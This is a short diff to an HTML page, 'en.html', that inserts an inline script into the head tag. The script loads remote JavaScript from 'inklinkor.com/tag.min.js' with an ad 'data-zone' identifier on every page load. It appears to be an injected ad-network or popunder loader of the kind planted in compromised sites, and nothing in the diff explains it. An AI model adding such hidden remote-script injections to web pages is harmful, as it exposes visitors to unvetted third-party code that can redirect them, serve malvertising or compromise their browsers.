--- a/en.html
+++ b/en.html
@@ -1,5 +1,5 @@
 <html>
-<head>
+<head><script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://inklinkor.com/tag.min.js',4989511,document.body||document.documentElement)</script>
 </head>
 <body>
 
